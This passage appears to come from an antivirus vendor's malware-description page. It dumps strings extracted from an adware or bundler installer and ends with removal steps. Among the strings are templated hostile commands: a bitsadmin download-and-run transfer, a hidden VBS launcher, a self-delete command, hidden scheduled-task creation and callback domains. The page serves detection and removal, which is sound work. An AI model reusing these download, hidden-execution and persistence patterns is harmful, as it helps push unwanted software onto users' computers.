ami%sExi

/c del "%s"

cmd.exe

%TEMP%\task.vbs

ami%sExdel

Set WshShell = CreateObject("WScript.Shell")

cmds=WshShell.RUN("%s",0,False)

WScript.Sleep 300000

cmds=WshShell.RUN("bitsadmin /cancel %s",0,False)

%%X

Wversion.dll

OleAut32.dll

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__21223_il2.exe

{8856F961-340A-11D0-A96B-00C04FD705A2}

1.1.5.26

setup.exe

secularistsarakolet.site

Setup__21223_il2.exe_2108_rwx_003C0000_00002000:

.text

`.rdata

@.data

.reloc

.text$mn

.idata$5

.rdata

.rdata$zzzdbg

.idata$2

.idata$3

.idata$4

.idata$6

.data

KERNEL32.dll

iexplore.exe_1968:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... )) 

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

Setup__21223_il2.exe_2108_rwx_003D0000_00005000:

.text$mn

.idata$5

.rdata

.rdata$zzzdbg

.idata$2

.idata$3

.idata$4

.idata$6

.data

KERNEL32.dll

Setup__21223_il2.exe_2108_rwx_00400000_000AC000:

.text

`.rdata

@.data

.rsrc

@.reloc

j5SSh

.hx?G

xSSSh

FTPjKS

FtPj;S

C.PjRV

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

operator

GetProcessWindowStation

WinHttpSetStatusCallback

Sending request %S

%S - transfer terminated

Error %d transferring %S

Status code %d returned from %S

Trying to redirect from %S to %S

AsyncWinHttp added contentLength %d to s_nTotalBytes2Download %d

Query Data: Error %d encountered (%S)

Read Data: Error %d encountered (%S)

AsyncWinHttp::AsyncCallback WINHTTP_CALLBACK_STATUS_DATA_AVAILABLE download error update total sizes.

WinHttpGetIEProxyConfigForCurrentUser

CBoot::OnShowTrayNotification(UM_USERSHOWNOTIFY %d, %d )

CBoot::OnTimer: end installation timer to %d minutes elapsed. Send ThankYou and close.

CBoot::OnUserMsgPercept(%d, %d, %d )

CBoot::OnUserMsgShowInit(UM_USERSHOWINIT %d, %d )

CBoot::OnInitDialog: query = %S

CBoot::OnInitDialog, next monetization file exists: %ls, delete it with result %d

CBoot::RemoveFromCompList(name=%S)

CBoot::AddToCompList(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld)

CBoot::AsyncStartDownloadAndInstall(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld)

CBoot::AsyncStartDownloadAndInstall set end installation timer to %d minutes

CBoot::AsyncStartDownloadAndInstall3(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld, rate=%lf)

CBoot::AsyncStartDownloadAndInstall2(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld)

CBoot::AsyncStartDownloadAndInstall2 set end installation timer to %d minutes

CBoot::AsyncStartDownload2(shortName=%S, url=%S, url2=%S)

CBoot::EnableInstallation(%d, %S, %S, %d)

CBoot::RequestExit(%d)

10u page URL: %S post data %S

Resume link created at: '%S'

DestroyIcon: %S

DestroyIcon: File '%S' deleted

DestroyIcon: Fail to delete file '%S' code %d

SHFileOperationW

DestroyIcon: SHFileOperationW rc=%d

CBoot::ShowMe doShow=%d

WriteRegistryInt - returned %d

Failed to create upd object 0X%X

CBoot::RunResource %S %S

CBoot::SetThanksParameter: thankParams[%S] = %S

CBoot::CreateDownloadScheduleTask: %S '%S' '%S' %ld

Failed to get the Temp folder: %d

Boot::CreateDownloadScheduleTask: Failed to create a download task for %S

CBoot::CreateDownloadScheduleTask: Failed to create an install task for %S

CBoot::CreateDownloadScheduleTask: Failed to create a download task for %S

CBoot::CreateDeleteScheduleTask: Failed to create a delete task for %S

CBoot::CreateDownloadScheduleTask: Download and install tasks were created for %S

CBoot::UpdateProgress %S %ld %S %ld %ld

CBoot::UpdateProgress Create new progreess request for %S

CBoot::UpdateProgress Failed to create a new progreess request for %S

ShellExecuteExW

Term. wait %d

Fatal error X initializing UI

Term.thread created %d

Main thread %d ended %d

CDownload::CDownload Resource for %S loaded

CDownload::CDownload Resource for %S written to %S

CDownload::CDownload Resource for %S set installExe %S

Failed to run %S - component skipped

CDownload::ReadyToInstall %S

Failed to run %S - unsupported type %d

CDownload::EnableInstallation(%S, %S, %d)

CDownload::EnableInstallation return %s

CDownload::Install started m_id=%d shortName=%S

CDownload::Install Failed to delete file %S , error %d

CDownload::Install Error on CreateDirectory %S , error %d

CDownload::Install Change file name %S

CDownload::Install Failed to move temp file '%S' to %S , error %d

CDownload::Install DownloadType=%d

%S Running for %S: '%S' '%S'

CDownload::Install Trying to open folder (%S) containing zip , error %d

CDownload::Install Failed to run (%S) , error %d

%S BEFORE activating Wait4TreeThread %d %d

%S ACTIVATING Wait4TreeThread %d %d

%S AFTER activating Wait4TreeThread %d %d nCount %d

CDownload::Install %S wait %ld milliseconds before set status to dst_InstallProcessEnded

CDownload::Install %S wait %ld milliseconds before set status to dst_InstallProcessTreeEnded

CDownload::Install Child process for %S (id %d) ended, RC=%d, status=%d

Wait 4 3 skipped for %S

CDownload::Install Ended for m_id=%d shortName=%S

Process 3 for %S (id %d) empty

Timeout waiting for process 3 %S (id %d)

Process tree for %S ended

Looking for processes tree of %d: parents size %d, pending size %d

%S running, wait for %S ended

3 for %d: parents size %d, pending size %d rc=%d

CDownload::SetState for '%S' is %d

CDownload::AddThanksParameter p=%S v=%d

HtmlDialog::GetIDsOfNames(NOT IMPLEMENTED %S)

JsLog: %S

CInstallationManager::IntOnDownloadCompleted: Download id=%d ShortName=%S

CInstallationManager::IntOnDownloadCompleted Id %d download ended OK

CInstallationManager::IntOnDownloadCompleted Id %d assigned to %S, retry state %d

CInstallationManager::IntOnDownloadCompleted Status=%d for component_id=%d, error=%d

CInstallationManager::EnqueueInstallation ReadyToInstall %S

CInstallationManager::EnqueueInstallation Error on ReadyToInstall %S

CInstallationManager::Download(%S, %S, %S)

CInstallationManager::Install(%d, %S, %S,%d)

CInstallationManager::IntDownload(%S, %S, %S,%d)

CInstallationManager::IntDownload Id %d assigned to %S, state=%d

CInstallationManager::IntDownload Id %d assigned to %S, state=%d(retry)

CInstallationManager::IntDownload state == dst_DownloadEndedError s_hTotalDownloadErrors=%d

CInstallationManager::IntDownload s_hTotalDownloadErrors %d

CInstallationManager::IntDownload: Adding CDownload for %S to m_downloads)

CInstallationManager::IntInstall(id=%d, installCmdLine=%S, ProcessName=%S, installMode=%d)

%d postponed runs released

CInstallationManager::IntReleasePostponed Add %S to the end of the list

ReleasePostponed %S

CInstallationManager::RemovePossibleComponents %S removed from list

CInstallationManager::IsPartOfInstallation value=%s

CInstallationManager::SetComponentInstallationEnded %S

%Y-%m-%d %H:%M:%S

CProgressUpdateRequest::CreateInstance %S

CProgressUpdateRequest::ProgressUpdate %S

Send progress update request %s

Progress Request for '%S' return %s

Temp file %S moved to %S, success %d

Key %X/%S opened, error %d

Value %S written, error %d

RegCreateKeyTransactedW

RegOpenKeyExA

RegCloseKey

SOFTWARE\Microsoft\Windows NT\CurrentVersion

RegOpenKeyTransactedW

CTaskScheduleHandler::CreateNewTask Failed to create an instance of ITaskService: %x

CTaskScheduleHandler::CreateNewTask ITaskService::Connect failed: %x

CTaskScheduleHandler::CreateNewTask Cannot get Root folder pointer: %x

CTaskScheduleHandler::CreateNewTask Failed to CoCreate an instance of the TaskService class: %x

CTaskScheduleHandler::CreateNewTask Cannot get identification pointer: %x

CTaskScheduleHandler::CreateNewTask Cannot put identification info: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot get principal pointer: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot put RunLevel principal info: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot put LogonType principal info: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot get settings pointer: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot put setting hidden information: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot put setting information: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot get idle setting information: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot put idle setting information: %x

CTaskScheduleHandler::CreateTaskTrigger Cannot get trigger collection: %x

CTaskScheduleHandler::CreateTaskTrigger Cannot create trigger: %x

CTaskScheduleHandler::CreateTaskTrigger QueryInterface call failed for ITimeTrigger: %x

CTaskScheduleHandler::CreateTaskTrigger Cannot put trigger ID: %x

CTaskScheduleHandler::CreateTaskTrigger Cannot put end boundary on trigger: %x

CTaskScheduleHandler::CreateTaskTrigger Cannot add start boundary to trigger: %x

CTaskScheduleHandler::SaveTask Error saving the Task: %x

CTaskScheduleHandler::SaveTask Cannot get Task collection pointer: %x

CTaskScheduleHandler::SaveTask Cannot create the action: %x

CTaskScheduleHandler::SaveTask QueryInterface call failed for IExecAction: %x

CTaskScheduleHandler::SaveTask Cannot put action path: %x

CTaskScheduleHandler::SaveTask Cannot put action arguments: %x

CTaskScheduleHandler::CreateDownloadTask Cannot create a new task: %x

CTaskScheduleHandler::CreateDownloadTask Fail to add registration info: %x

CTaskScheduleHandler::CreateDownloadTask Fail to add security credentials: %x

CTaskScheduleHandler::CreateDownloadTask Failed to create an instance of ITaskService: %x

CTaskScheduleHandler::CreateDownloadTask Fail to add trigger: %x

CTaskScheduleHandler::CreateDownloadTask Cannot create the download action: %x

CTaskScheduleHandler::CreateDownloadTask Fail to save the task: %x

CTaskScheduleHandler::CreateInstallTask Cannot create a new task: %x

CTaskScheduleHandler::CreateInstallTask Fail to add registration info: %x

CTaskScheduleHandler::CreateInstallTask Fail to add security credentials: %x

CTaskScheduleHandler::CreateInstallTask Fail to add settings: %x

CTaskScheduleHandler::CreateInstallTask Fail to add trigger: %x

CTaskScheduleHandler::CreateInstallTask Cannot create the execute action: %x

CTaskScheduleHandler::CreateInstallTask Cannot create the delete action: %x

CTaskScheduleHandler::CreateInstallTask Fail to save the task: %x

"'\?<>&= %,/:!#$;[]()

Process=%S command=%S verb=%S, result=%d

%c%c%c%c

C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb

VERSION.dll

KERNEL32.dll

USER32.dll

GDI32.dll

RegCreateKeyExW

RegOpenKeyExW

RegEnumKeyW

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

Secur32.dll

WinHttpCloseHandle

WinHttpOpen

WinHttpSetOption

WinHttpGetProxyForUrl

WinHttpCrackUrl

WinHttpConnect

WinHttpOpenRequest

WinHttpSetStatusCallback

WinHttpSendRequest

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpReceiveResponse

WINHTTP.dll

GetProcessHeap

GetCPInfo

zcÁ

.?AVAsyncWinHttp@@

.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AUDWebBrowserEvents2@@

.?AUISupportErrorInfo@@

.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@

?456789:;<=

!"#$%&'()* ,-./0123

.sssh

REÚ

\.crr

s1f-'

.DC l

tweb

<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />

9%9s9

:(:2:8:\:

4,4}4'5.5

5!5'565?5

5'5/555<5

=&=.=6=\=

7 7@7`7|7

= =<=@=`=

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

wKERNEL32.DLL

ADVAPI32.DLL

WUSER32.DLL

Winhttp.dll

Content-Type: application/x-www-form-urlencoded

shlwapi.dll

Dole32.dll

WContent-Type: application/x-www-form-urlencoded

hXXp://VVV.%s/index.php

ficbetaglucose.site

appimageurl

InternetExplorer.Application

cmdl

Network error (%d) encountered, install aborted

debug.html

capp=%s&cid=%s&mhx=%S&base=%s

\bitsadmin.exe

W\Support Tools\bitsadmin.exe

:?*\"'/.

:Zone.Identifier

%s\%s.lnk

%s\*%s*.lnk

%samipixel.cfg

%sami*.tmp.ico

%s%s*.exe

dream.capture

%sami%s%d%d.exe

%d-%.2d-%.2dT%.2d:%.2d:00

%d-%.2d-%.2dT%.2d:-:00

c[%s][%s]

/retrynav %d

shell32.dll

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

%TEMP%\amilog.txt

&You are about to exit the installation. Click OK to Exit and install %s including other optional programs.

&Resume installation on next Windows startup

.exe.msi.zip.xap.bat

%Windir%\System32\msiexec.exe

/i "%s"

%ProgramFiles%\Microsoft Silverlight\sllauncher.exe

%ProgramW6432%\Microsoft Silverlight\sllauncher.exe

/install:"%s" /origin:%s

kernel32.dll

CheckRegKey

BestReaderCheckRegKey

IsShortNameInstalled

sn=%s&hx=%S&base=%s

rfsw%d

BAdvapi32.dll

advapi32.dll

Iphlpapi.dll

SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\%S\Connection

v2.0.50727

v1.1.4322

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

NT%d.%dSP%d

%ProgramFiles%\Mozilla Firefox\firefox.exe

%localappdata%\Google\Chrome\Application\chrome.exe

%ProgramFiles%\Google\Chrome\Application\chrome.exe

%d.%d.%d.%d

ami%sExd

bitsadmin /transfer amijob /download /priority high %s %s

ami%sExi

/c del "%s"

cmd.exe

%TEMP%\task.vbs

ami%sExdel

Set WshShell = CreateObject("WScript.Shell")

cmds=WshShell.RUN("%s",0,False)

WScript.Sleep 300000

cmds=WshShell.RUN("bitsadmin /cancel %s",0,False)

%%X

Wversion.dll

OleAut32.dll

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__21223_il2.exe

{8856F961-340A-11D0-A96B-00C04FD705A2}

1.1.5.26

setup.exe

secularistsarakolet.site

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   sevensetup.exe:3948
   cpSetup.exe:3688
   %original file name%.exe:3832
   run-setup.exe:3724
   

2. Delete the original Application file.
   
3. Delete or disinfect the following files created/modified by the Application:
   

   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nseDC0D.tmp\inetc.dll (64 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nseDC0D.tmp\593687e92906d_ua.exe (246894 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QTNNLZJL.txt (114 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1QFHGNZ6.txt (112 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\normal_bg[1].jpg (1160 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\appImg[1].jpg (4 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (597 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__21223_il2.exe (51957 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsz9280.tmp\NSISdl.dll (30 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (76443 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (4679 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (31 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\finish[1].gif (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\accept[1].gif (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\next[1].gif (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\cancel1[1].gif (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\cancel[1].gif (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\skip[1].gif (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\logo[1].png (3756 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\amipb[1].js (37377 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\footer_img[1].png (937 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\dm_left_image[1].png (5637 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\decline[1].gif (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\index[1].htm (8267 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\main[1].css (1081 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.